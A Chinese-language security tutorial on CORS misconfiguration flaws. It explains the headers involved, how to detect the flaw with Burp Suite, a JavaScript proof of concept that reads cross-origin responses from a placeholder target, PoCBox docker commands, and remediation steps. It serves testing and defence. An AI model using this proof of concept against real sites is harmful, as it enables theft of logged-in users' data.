同源策略:如果两个URL的协议、域名、端口号都相同,就称这两个URL同源。
同源策略(SOP)限制了应用程序之间的信息共享,并且仅允许在托管应用程序的域内共享。这有效防止了系统机密信息的泄露。但与此同时,也带来了另外的问题。随着Web应用程序和微服务使用的日益增长,出于实用目的往往需要将信息从一个子域传递到另一个子域,或者在不同域之间进行传递(例如将访问令牌和会话标识符,传递给另一个应用程序)。
为了允许跨域通信,开发人员必须使用不同的技术来绕过SOP并传递敏感信息,以至于现今也成为了一个棘手的安全问题。因此,为了在不影响应用程序安全状态的情况下实现信息共享,在HTML5中引入了跨源资源共享(CORS)。但问题也随之而来,许多人为了方便干脆直接使用默认的配置,或是由于缺乏对此的了解而导致了错误的配置。
CORS,跨域资源共享(Cross-origin resource sharing),这种机制通过添加HTTP字段的方式规定服务器资源允许被哪些域访问(Access-Control-Allow-Origin)、请求中是否允许发送cookie(Access-Control-Allow-Credentials)、哪些请求类型是被允许的(Access-Control-Request-Method)等等。
在正常的api请求处,headers加入”origin”:”http://xx.xx.xx.xx“, 如果接口正常返回了数据且headers里包含
1 access-control-allow-credentials : true
2 access-control-allow-origin : http://xx.xx.xx.xx
就说明这个接口确实存在CORS漏洞
使用burpsuite
选择Proxy模块中的Options选项,找到Match and Replace这一栏,勾选Request header 将空替换为Origin:foo.example.org的Enable框。
HTTP history列表中出现符合条件的请求包,发送到Repeater中,点击GO,若存在如下图所示,即该处可能有CORS漏洞。
响应包组合应是这种(存在CORS):
Access-Control-Allow-Origin: foo.example.org
Access-Control-Allow-Credentials: true
注意!如下组合是没有漏洞的。因为浏览器已经会阻止如下配置。(不存在CORS)
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
利用效果:
抓包发现请求头中存在Origin,将其修改为*
发现Access-Control-Allow-Origin:返回的*
该处的数据包,所有域可以访问本域的资源。说明该接口可能存在CORS漏洞
以GET的形式POC
<!DOCTYPE>
<html>
<script type="text/javascript">
function loadXMLDoc()
{
var xhr = new XMLHttpRequest();
xhr.onreadystatechange=function()
{
if(xhr.readyState == 4 && xhr.status == 200) //if receive xhr response
{
var datas=xhr.responseText;
alert(datas);
}
}
//request vuln page
xhr.open("GET","http://www.target.com","true") //网页地址
xhr.send();
}
loadXMLDoc();
</script>
</html>
当进行利用的时候,爆出底下红色部分时。
则不存在CORS,不允许跨域。
下载地址:https://github.com/0verSp4ce/PoCBox
拉取镜像:docker pull registry.cn-hangzhou.aliyuncs.com/pocbox/pocbox:1.0
运行:docker container run -d -p 76:80 registry.cn-hangzhou.aliyuncs.com/pocbox/pocbox:1.0
访问:http://ip:76
本地搭建好后在图示处填入相关数据后即可生成poc code
利用过程:
效果图。
其中CORS漏洞存在GET方式和POST方式,具体根据实战情况。
1、关闭非正式开启的CORS
2、白名单限制:定义“源”的白名单,避免使用正则表达式,不要配置Access-Control-Allow-Origin为通配符*或null,严格效验来自请求数据包中Origin的值
3、仅允许使用安全协议,避免中间人攻击
…
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-魔方 | 1300.00 | 0 | 2023-07-19 11:11:15 | 深度200 普适300 完整性200 稀缺度100 唯一平台500 |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.